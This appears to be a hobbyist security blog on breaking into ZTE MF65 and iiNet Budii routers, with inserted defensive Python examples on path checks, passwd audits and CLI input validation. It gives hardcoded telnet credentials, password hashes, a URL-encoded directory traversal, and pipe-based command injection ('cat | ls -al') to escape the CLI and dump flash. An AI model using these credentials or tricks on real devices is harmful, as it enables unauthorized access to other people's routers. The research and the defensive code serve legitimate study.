Saturday, 8 July 2017

///ZTE mf65 Mode Switch(Updated)///

///ZTE mf65 Mode Switch///

this page is uploaded to any web dir:

<body class="subpage_body_web" style="overflow-x:hidden;" onLoad="initPage();">
<form name="mode_switch" action="/goform/goform_process" method="post">
<input type="hidden" value="MODE_SWITCH" name="goformId" id="goformId">
<table cellspacing="0" cellpadding="10" width="100%" border="0">
<tr><td valign="top">
    <table id="mode_setting_table" cellspacing="0" cellpadding="0" width="100%" border="0">
    <tr><td><h1>Mode Switch:</h1></td></tr>
    <tr><td class="top_head" id="factory_mode_td">
        <input type="radio" value="FACTORY" name="switchCmd" id="switchCmd" class="radioStyle" <% asp_match("current_mode","FACTORY","checked"); %>>
        <span id="factory_mode">Download Mode(DIAG+AT+MODEM)</span>
    </td></tr>
    <tr><td class="head" id="debug_mode_td">
        <input type="radio" value="DEBUG" name="switchCmd" id="switchCmd" class="radioStyle" <% asp_match("current_mode","DEBUG","checked"); %>>
        <span id="debug_mode">Debug Mode(RNDIS+DIAG+AT+MODEM)</span>
    </td></tr>
    <tr><td class="head" id="work_mode_td">
        <input type="radio" value="WORK" name="switchCmd" id="switchCmd" class="radioStyle" <% asp_match("current_mode","WORK","checked"); %>>
        <span id="work_mode">Work Mode(RNDIS)</span>
    </td></tr>
    <tr><td class="head">
        1. After you have selected and applied the switch, check the page title for status, then refresh!
    </td></tr>
    <tr><td class="head">
        To return to default mode Send AT+ZCDRUN=9 Then AT+ZCDRUN=F to COM(X) ZTE NMEA Device{??}
    </td></tr>
    <tr><td class="head">
        <div class="form-buttons">
            <input type="submit" class="btn-1 " trans="apply" align="center"/>
        </div>
    </td></tr>
    </table>
</td></tr>
</table>
</form>

<script type="text/javascript" src="/js/lang.js"></script>
<script type="text/javascript">
var language = '<% asp_get("Language"); %>';
Butterlate.lang = language;
var current_mode   = '<% asp_get("current_mode"); %>';
var is_persist   = '<% asp_get("debug_mode_is_persist"); %>';
    // handleForm() is never called by this page, and the form has no field
    // named "mode"; the radio buttons above submit switchCmd directly.
    function handleForm()
    {
        if (document.mode_switch.mode[0].checked == true)
            document.getElementById("switchCmd").value = "FACTORY";
        else if (document.mode_switch.mode[1].checked == true)
            document.getElementById("switchCmd").value = "DEBUG";
        else if (document.mode_switch.mode[2].checked == true)
            document.getElementById("switchCmd").value = "WORK";
    }
</script>
</body>

///////ZTE MF65 -- Unlocking A Few More features (Fastboot)


By changing the file that controls the menus
we can enable/disable a few more options like:







((#firewall ))


we simply uncomment the entries and re-upload the file, which enables
any function that has been left out;
see the previous methods for ways to do this if unsure

[extra note]
this file can also be used to disable the httpshare for guests
this file can be used to either strengthen or weaken a router's structure and presentation to anyone able to access its webserver.

please be mindful of the closing brackets on the file

iiNet Budii(1031) (Telnet Access)(With Username and Password)

iiNet Budii(1031) (Telnet Access)
so telnet was always another open port available to us from the network,
although it never responded to any login attempts even if we 100% knew the password and user was correct;

This was solvable by one of two approaches.

The easiest by far was to simply grab the consumer release of the firmware,
inside its folders is a compilable c file for telnet (they've named it telnetc)

this is a pretty basic busybox telnet file
a few modifications have been made over the years
 one includes this little function

    telnet_data_set_autheninfo(&g_telnet_data, "iismshamswii", "i20U18r4E3");
    addr.s_addr = inet_addr("");
    telnet_data_set_serverinfo(&g_telnet_data, &addr, 23);

meaning that iismshamswii will work as the username
with i20U18r4E3 as the password.
so once we have logged in we use iinet@sh to break out of the cli, and we have full access to the router.
searching the strings of the telnetc file on the router (obtained by any earlier method) will also provide those two pieces of information, as they are hardcoded into all of the routers using that firmware unless that part has been patched or the telnet packets are otherwise dropped.

(extra note)
^^^the password can be changed by admin with an external mips passwd program [usb], but only until restart.

Wednesday, 17 May 2017

//////ZTE MF65 -- EFS access method / partial Fs dump

In the last mf65 post
 we covered the local file listing method
 and briefly touched on the changes to the config file
 for constant file listing for the sd card functions

i managed to soft brick my device by directory traversal
on the sd card base path
basically the router would try and load the httpshare page,
get to the share path and sd base path,
ultimately just reading /mmc2/../
and it would just freak out and not load
so it sat around for a while.

Now I'm back and have a solution that
 fixes my problem and gives us access to the internal files

we will need a windows machine (xp++)
 QPST, the modem drivers and

(ZTE WCDMA technologies MSM issue ??)
(if you cannot find the drivers keep looking they are around
try dcunlocker support files(i had to try several drivers before my machine acknowledged them))

using :

we get these devices
  • ZTE Diagnostics Interface (COMX)
  • ZTE NMEA Device (COMY)
  • ZTE Proprietary USB Modem 

 ((at this point if you do something stupid you may lose your router))
 ***if you want to resume normal functions simply use****

Now we load up QPST configuration and it will point at our modem,
if not fix the settings to point it at the correct com port,
then start the efs explorer,
you will be taken to the primary partition,
in which there is not much of interest,
by clicking into the secondary partition
we see the file system we saw with the local file exploit,
the files can be copied out by right clicking on the file and selecting to save the file to pc
this is also great for any modification
 you would like to make to either the webservice or the other files,
just ensure you make a back up of the files,
 as they cannot be restored.
(warning i have not tested the modem after any modification to see if the sim services are still functioning) 

you can dump the nvram out with the QPST tools as well.
we really haven't gained much of a new hold, except now we have a way to effectively alter the web file system, and we have gained copies of two parts of the memory + a 100% copy of the ztemodem.iso and a few other files that were not available for the webserver to load.

Stay tuned as we continue to look for roots!!

Tuesday, 16 May 2017

iiNet Budii(1031) Local File Listing (USBwebserver)

This is a method to list the local files on the router via wftp (USBwebserver):
Requires login and usb inserted into the aux usb ports (fat/ntfs)(*1)
Either goto:

To turn on the fileserver,
now point your browser here: 

(notice the URL encoding: the straight traversal is rejected by the webserver, not even making its way to the app,
but with encoded slashes we beat the checks)

  and click save 

now we goto:

And we see our routers internal files.
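
Why the encoded slashes get through, and the check that closes the gap, as an added example that is not part of the original post. `naive_allows` is an assumed model of a filter that inspects the still-encoded request path; `safe_share_path` decodes first and then confirms the result stays under the share root. `SHARE_ROOT` and the sample paths are constructed, since the real mount point is not given here.

```python
import posixpath
from urllib.parse import unquote

SHARE_ROOT = "/mnt/usb1"  # assumed mount point, not taken from the post


def naive_allows(raw):
    """Assumed model of the flawed filter: looks at the raw, still-encoded path."""
    return "../" not in raw and "/.." not in raw


def fully_decode(raw, max_rounds=5):
    """Percent-decode until the value stops changing (covers %252f double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(raw)
        if decoded == raw:
            return decoded
        raw = decoded
    raise ValueError("too many encoding layers")


def safe_share_path(raw, root=SHARE_ROOT):
    """Return the canonical path under root, or raise ValueError."""
    decoded = fully_decode(raw)
    if "\x00" in decoded or "\\" in decoded:
        raise ValueError("illegal character in path")
    # Collapse "." and ".." only after decoding, then check containment.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("path escapes share root")
    return candidate


if __name__ == "__main__":
    for sample in ("photos/a%20b.jpg", "..%2f..%2fetc%2fpasswd"):
        try:
            print(sample, "->", safe_share_path(sample))
        except ValueError as err:
            print(sample, "-> rejected:", err)
```

`normpath` is purely lexical; on a real filesystem the same containment test should run on the `os.path.realpath` result so that symlinks on the USB stick cannot point outside the root.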

we can wget out a copy of the systems memory with this enabled and scrape/view many of the files including the passwd file in the web browser:


iiNet Budii(1031) (UART based privesc attacks)

Opening the case we find an internal usb; we can also see an altera max jtag breakout, a large set of gpio pins and a UART breakout.

connecting to the uart and booting we can see the modem is running a broadcom firmware

CFE version 1.0.38-112.118 for BCM96362 (32bit,SP,BE)
Build Date: Fri Dec 6 11:09:42 CST 2013 (root@Ayecom)
Copyright (C) 2000-2011 Broadcom Corporation.
Chip ID: BCM6362B0, MIPS: 400MHz, DDR: 333MHz, Bus: 166MHz
Total Memory: 134217728 bytes (128MB)
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel

the user names available to us are:

upon logging in we are brought into a console(d), the commands available to admin are :

help           logout      exit       quit     reboot       adsl       
xdslctl           xtm      brctl      cat     loglevel       logdest
virtualserver  ddns      df    dumpcfg   dumpmdm   meminfo
psp   kill    dnsproxy    syslog    echo  ifconfig   ping
ps    pwd        sntp     sysinfo      tftp   voice
wlctl wifidefault arp defaultgateway  dhcpserver  dns
endbg dac3120_dbg cpld_led  lan  lanhosts   passwd  ppp
restoredefault  route save  swversion  cfgupdate  swupdate
exitOnIdle  wan  7sl  factoryrestore  factorywifi sysreport
 audiotest   usbinfo  zigbeetest  stopzigbee  initzigbee

The user account is slightly less privileged than the admin.

a quick cat of etc/passwd or var/passwd gives us:

support:tByR37W8BPs8g:0:0:Technical Support:/:/bin/sh                          
user:hfO9hSymQzRIQ:0:0:Normal User:/:/bin/sh                                   
nobody:FpbmJjv2tUjNk:0:0:nobody for ftp:/:/bin/sh                              

the passwords are all UN=PW except for iinetbob.(pword unknown)
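
An audit of a passwd file with the weaknesses visible in the dump above (every account on UID 0, hashes stored in the world-readable file in the 13-character traditional crypt format, a service account with a shell), as an added example that is not part of the original post. The sample file is constructed and its hash fields are placeholders.

```python
import re

# Traditional crypt(3) DES output: 2-char salt + 11 chars, 13 in total.
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")
LOCKED = {"x", "*", "!", "!!"}  # hash kept elsewhere, or account locked
SERVICE_ACCOUNTS = {"nobody", "daemon", "ftp"}

# Constructed sample shaped like the dump above; hash strings are placeholders.
SAMPLE_PASSWD = """\
support:PLACEHOLDER01:0:0:Technical Support:/:/bin/sh
user:PLACEHOLDER02:0:0:Normal User:/:/bin/sh
nobody:PLACEHOLDER03:0:0:nobody for ftp:/:/bin/sh
daemon:x:1:1:daemon:/:/bin/false
"""


def audit_passwd(text):
    """Return a sorted list of (account, finding) tuples for passwd-format text."""
    findings, uid0 = [], []
    for line in text.splitlines():
        fields = line.rstrip().split(":")
        if len(fields) != 7:
            continue  # blank or malformed line
        name, pw, uid, _gid, _gecos, _home, shell = fields
        if uid == "0":
            uid0.append(name)
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in LOCKED:
            kind = "DES crypt hash" if DES_CRYPT.match(pw) else "password hash"
            findings.append((name, kind + " in world-readable passwd"))
        if name in SERVICE_ACCOUNTS and shell.endswith("sh"):
            findings.append((name, "service account has a login shell"))
    if len(uid0) > 1:
        others = len(uid0) - 1
        for name in uid0:
            findings.append((name, "shares UID 0 with %d other account(s)" % others))
    return sorted(findings)


if __name__ == "__main__":
    for account, finding in audit_passwd(SAMPLE_PASSWD):
        print("%-8s %s" % (account, finding))
```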

Ok so bobs pword is supposed to be super long and i don't have it so i need more access, to see the file system..

We use a pipe | on cat or ping; really anything will work at this point, just that cat is cleaner

so we use:

>cat | ls -al

Because the second command is not bound to console(d), we can use all of
the busybox/sh/ash command set, but after the command we are returned to the console(d)
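
How a restricted CLI can close this hole, as an added example that is not part of the original post and not the firmware's code. `flawed_accepts` is an assumed model of a check that validates only the first word before the line reaches a shell; `build_argv` rejects shell metacharacters, validates arguments per command, and returns an argv list meant to be executed directly without a shell. The `/var/log` restriction on `cat` and the policy table are assumptions.

```python
import ipaddress
import posixpath
import shlex

SHELL_META = set("|&;<>`$(){}\\\n*?~!#")


def flawed_accepts(line):
    """Assumed weak check: only the first word is compared with the menu."""
    words = line.split()
    return bool(words) and words[0] in POLICY


def _no_args(args):
    if args:
        raise ValueError("this command takes no arguments")


def _one_ip(args):
    if len(args) != 1:
        raise ValueError("expected exactly one address")
    ipaddress.ip_address(args[0])  # raises ValueError for anything else


def _one_log_path(args):
    # Assumed policy: cat may only read files under /var/log.
    if len(args) != 1 or not posixpath.normpath(args[0]).startswith("/var/log/"):
        raise ValueError("cat is limited to files under /var/log")


# Command name -> argument validator (names are a subset of the menu above).
POLICY = {"cat": _one_log_path, "ping": _one_ip, "df": _no_args, "ps": _no_args}


def build_argv(line):
    """Return an argv list to exec directly (no shell), or raise ValueError."""
    bad = SHELL_META.intersection(line)
    if bad:
        raise ValueError("shell metacharacters rejected: %r" % sorted(bad))
    argv = shlex.split(line)  # unbalanced quotes also raise ValueError
    if not argv or argv[0] not in POLICY:
        raise ValueError("not a CLI command")
    POLICY[argv[0]](argv[1:])
    return argv
```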

by inserting a usb into the internal port we can simply cp out the files we need

>cat | cp "/dev/mtd0" "/dev/mtd1" "/dev/mtd2" "/dev/mtd3" > (your drive)

Looking into the console(d) routines and its links to {lib file:libcms_cli}
 we find a table of hiddencmds
 one of them more interesting than others:

# DATA XREF: .data:cliHiddenCmdTable o


this command breaks out of console(d) without killing the supervisors (smd&ssk)
we can always use the cat trick and break into sh but it sometimes fouls the smd control.

the command can be used in both the user account and the admin account, so if in theory the router's admin was locked we could use the user account and privesc commands to gain a high level access.

We are still very limited as to how far we can swing inside the commands, as the smd and ssk respond to a lot of the actions placed across the userland (telnet & ssh)

The config files can be dumped via  >dumpmdm or dumpconfig

which will also dump the users and passwords with no encoding/hashes

<AdditionalHardwareVersion>BoardId=GGDV711_iiNet</AdditionalHardwareVersion>   <X_BROADCOM_COM_LoginCfg>

Till Next Time.

Friday, 24 June 2016

/////ZTE MF65 -- local file listing method 3(LFLM )The Full Package /////

another super quick one, for an even better listing in the web application, with the ability to change your path via the sd card settings. we use the exploit from last time to gain web app access to the web folder; this time though we have a little bit more work to do, so here we go from the start:

POST /goform/goform_set_cmd_process HTTP/1.1


using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager,
you will need to be logged in for this method.

so your work flow is:
  1. login
  2. send request to change path 
  3. logout
use the httpguest button to see the files

now we will navigate to web/js/config/ then we will download the config.js file and change the line :

 SD_BASE_PATH: /mmc2/



and reupload it under whatever name you would like (i did config.js.1),
 then rename the original config.js, then rename the new config to replace the old one. i wouldn't screw around for too long though, as not having the config file may mess things up. now refresh your page and check your sd card settings page to see our changes,

 here i must

Warn against changes of //web/js/config/config.js
Line : SD_BASE_PATH: /mmc2/
Against any directory traversals, in any sense or method, as they will not work...

any changes to this path that will reflect as " "(an empty path) will render the online sd functions unusable and returning to normal operation at this point is not available via the methods we can employ.. (we need telnet)

so don't upload the file with  /mmc2/../ or anything like that,

till next time,
shoot straight,